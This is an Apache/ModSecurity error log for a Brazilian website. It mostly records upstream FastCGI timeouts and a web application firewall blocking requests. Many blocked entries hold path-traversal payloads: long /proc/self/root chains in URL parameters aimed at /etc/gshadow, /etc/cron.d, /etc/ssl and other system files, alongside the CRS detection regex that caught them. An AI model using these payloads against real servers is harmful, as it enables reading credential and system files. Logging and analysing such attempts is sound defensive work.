[Thu Mar 19 06:02:44.375411 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:38172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu7tAbLMZ6AikZjR9U2zgAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 06:02:44.930942 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.244.43:58878] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu7tOyqAr6etmhZHNo9UAAAAEw"]
[Thu Mar 19 06:02:56.133806 2026] [proxy_fcgi:error] [pid 17653:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45110] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:03:18.121778 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45642] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:03:41.125813 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:04:04.091215 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46670] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:04:28.417810 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:47164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:04:56.108824 2026] [proxy_fcgi:error] [pid 19093:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:47702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:05:36.503211 2026] [proxy_fcgi:error] [pid 27403:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:48578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:05:42.912957 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.228.61:41900] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu8Zvu8EFLIOrSqIpt52AAAAk4"]
[Thu Mar 19 06:06:12.145946 2026] [proxy_fcgi:error] [pid 30077:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:49326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:06:41.165846 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:07:07.941930 2026] [proxy_fcgi:error] [pid 30077:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:50614] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:07:30.873813 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51270] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:07:45.773404 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.244.43:50780] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu84f-YZRR_7pZ7nDJn1QAAA80"]
[Thu Mar 19 06:07:53.109996 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51836] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:08:14.089835 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:08:36.109881 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:52974] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:08:57.137810 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:53492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:09:18.125913 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:54166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:09:39.121756 2026] [proxy_fcgi:error] [pid 14269:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54728] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:10:00.045898 2026] [proxy_fcgi:error] [pid 31803:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55342] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:10:18.358717 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:37046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu9eta6ubjKNq_cu4Yf2wAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:10:21.157918 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55882] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:10:39.511221 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:51620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu9jwkwaGbbGflqUZCTZQAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:10:40.800731 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.243.128:42482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu9kF_V7PWP6ixUYl6WaQAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:10:43.129849 2026] [proxy_fcgi:error] [pid 19093:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56416] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:10:44.062929 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.228.61:39634] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu9lAbLMZ6AikZjR9U30AAAAAc"]
[Thu Mar 19 06:11:06.129155 2026] [proxy_fcgi:error] [pid 14269:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:56972] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:11:34.121823 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:12:05.102928 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58232] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:12:36.114278 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59108] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:12:53.233541 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.244.43:50540] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu-Fda6ubjKNq_cu4YgWwAAA0o"]
[Thu Mar 19 06:13:00.137796 2026] [proxy_fcgi:error] [pid 19093:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59610] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:13:26.125802 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60186] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:13:50.433947 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:13:59.540404 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:42494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-V_u8EFLIOrSqIpt7ZQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:03.061969 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:36286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-W1_V7PWP6ixUYl6WwQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:06.392651 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:36302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-Xvu8EFLIOrSqIpt7ZgAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:11.415818 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:43398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-Y-yqAr6etmhZHNo-8wAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:13.129779 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:14:29.547404 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.243.128:43410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-dV_V7PWP6ixUYl6W1wAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:34.823022 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.243.128:52934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-ev-YZRR_7pZ7nDJovAAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:35.153598 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33680] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:14:39.292207 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:52936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-f9a6ubjKNq_cu4YgowAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:43.299311 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:46166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-gwbLMZ6AikZjR9U4LQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:46.378962 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:46174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-hgkwaGbbGflqUZCT9AAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:50.671185 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:39148] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-isdf6f5d65gmYZRPZwAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 06:14:57.049877 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34238] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:14:57.379184 2026] [:error] [pid 27403:tid 140411658000128] [client 74.7.243.128:39160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu-kBkFeYa1D6dYQnDKrAAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
